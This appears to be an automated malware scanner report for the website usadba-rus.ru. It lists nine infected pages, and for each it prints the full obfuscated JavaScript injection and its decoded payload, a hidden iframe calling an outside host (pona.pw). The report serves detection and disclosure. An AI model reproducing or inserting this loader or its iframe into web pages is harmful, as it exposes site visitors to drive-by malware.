Malware Scanner report for usadba-rus.ru

Malicious/Suspicious/Total urls checked: 9/0/15

9 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "usadba-rus.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=usadba-rus.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://usadba-rus.ru/	200 OK Content-Length: 12920 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/media/system/js/core.js	200 OK Content-Length: 4225 Content-Type: application/x-javascript	clean
http://usadba-rus.ru/media/system/js/mootools-core.js	200 OK Content-Length: 88540 Content-Type: application/x-javascript	clean
http://usadba-rus.ru/media/system/js/caption.js	200 OK Content-Length: 800 Content-Type: application/x-javascript	clean
http://usadba-rus.ru/templates/versia2/jquery.js	200 OK Content-Length: 91671 Content-Type: application/x-javascript	clean
http://usadba-rus.ru/templates/versia2/script.js	200 OK Content-Length: 7153 Content-Type: application/x-javascript	clean
http://usadba-rus.ru/index.php/o-kompanii	200 OK Content-Length: 17502 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/index.php/prajs	200 OK Content-Length: 11400 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/index.php/novosti	200 OK Content-Length: 12910 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/index.php/landshaftnyj-dizajn	200 OK Content-Length: 11464 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/index.php/vodojomy	200 OK Content-Length: 11411 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/index.php/vodojomy/oborudovanie	200 OK Content-Length: 11467 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/index.php/nashi-proekty	200 OK Content-Length: 15841 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/index.php/kontakty	200 OK Content-Length: 11924 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5\|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-\|+#..-^-&/+/)-~-:/&+`-}-[-}-\|+<..+}+~-&--/.-:-#-\|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-\|---:/\|-~/^...)//-&-^/^-;+#..+:+)...)-;-\|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-\|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports: F-Prot HTML/IFrame Commtouch HTML/IFrame
http://usadba-rus.ru/test404page.js	404 Not Found Content-Length: 307 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: usadba-rus.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 27 Jan 2015 16:09:32 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 21e75628f1cd7e79ea56ea6c97167af0=451b5bc02f444b67c9282d3b8f85f6ec; path=/
X-Powered-By: PHP/5.5.20

Second query (visit from search engine):
GET / HTTP/1.1
Host: usadba-rus.ru
Referer: http://www.google.com/search?q=usadba-rus.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for usadba-rus.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools